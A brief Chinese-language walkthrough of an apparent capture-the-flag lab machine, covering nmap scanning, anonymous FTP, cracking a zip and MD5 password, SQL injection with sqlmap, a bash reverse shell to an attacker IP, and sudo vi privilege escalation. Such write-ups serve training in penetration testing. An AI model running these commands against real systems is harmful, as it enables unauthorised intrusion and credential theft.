0x01 信息收集
nmap -sC -sV 10.129.41.14
发现21 ftp
22 ssh
80 web 端口开放
其中21端口允许anonymous匿名登录
0x02对22端口测试
ftp 10.129.41.14
anonymous
发现存在一个back.zip 文件
解压发现存在密码
使用zip2john backup.zip > hashes
将backup.zip 的哈希导出
john -wordlist=/usr/share/wordlists/rockyou.txt hashes
John 爆破只会显示第一次的结果
如果要显示之前的结果
john hashes --show
这里密码是741852963
解压后里面是index.php
md5 解码后密码是 qwerty789
0x03 对80端口进行测试
访问80端口,登录之后有一个搜索框。
插入一个’ 报错 应该是存在注入
用sqlmap跑一下
sqlmap -u 10.129.41.14/dashboard.php --cookie
得带上cookie 不然跑不了
获取到一个webshell
bash -c 'bash -i >& /dev/tcp/10.10.14.90/1234 0>&1'
kali上开启nc监听 获得一个反弹shell
在/var/www/html/dashboard.php 下发现
postgres的账号密码
尝试ssh登录
sudo -l 查看
发现此用户 /bin/vi 处理/etc/postgresql/11/main/pg_hba.conf 具有root权限
在GTFO上搜一下操作
获得root权限
0x04 总结
nmap扫描 发现开启22 21 80
21匿名登录 john 爆破backup 文件
得到网页登录密码 后台存在注入 --os-shell 成功获取 webshell
转成反弹shell 在网站下找到 ssh 密码
登录ssh sudo -l 查看可以提权的点
在gtfobin上看见提权的操作
获得root权限